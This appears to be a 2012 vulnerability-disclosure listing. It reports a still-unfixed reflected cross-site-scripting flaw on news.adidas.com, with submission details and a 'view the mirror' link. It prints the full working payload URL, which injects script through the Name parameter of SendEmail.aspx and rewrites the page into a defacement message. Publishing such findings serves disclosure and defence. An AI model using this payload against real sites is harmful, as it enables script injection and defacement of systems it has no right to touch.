Security researcher flexxpoint, has submitted on 04/02/2012 a cross-site-scripting (XSS) vulnerability affecting news.adidas.com, which at the time of submission ranked 4508 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 06/02/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/02/2012 |
Date published: 06/02/2012 |
Fixed? Mail us! | Status: UNFIXED |
Author: flexxpoint |
Domain: news.adidas.com |
Category: XSS |
Pagerank: 4508 |
URL: http://news.adidas.com/ContentPage/SendEmail.aspx?Name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3 Ealert(String.fromCharCode(66,101,115,116,32,114,101,103,97,114,100,115,32,102,114,111,109,32,66,117 ,108,103,97,114,105,97))%3C/script%3E'%22%3E%3Cscript%3Edocument.body.innerHTML=%22%3Cstyle%3Ebody{v isibility:hidden;%20background:black;}%3C/style%3E%3Cdiv%20style=visibility:visible;%3E%3Ccenter%3E% 3Ch1%3E%3Cfont%20color='white'%3EPlease%20fix%20your%20%3C/font%3E%3Cfont%20color='red'%3E%20XSS%20% 3C/font%3E%3Cfont%20color='white'%3E!%3C/font%3E%3C/h1%3E%3Cfont%20color='white'%3EBest%20regards%20 from%20Bulgaria!%3Ch1%3E%3Cfont%20color='red'%3E%20%20flexxpoint%3C/font%3E%3C/h1%3E%3Cbr%3E%22;%3C/ script%3E |
Click here to view the mirror
|
|
|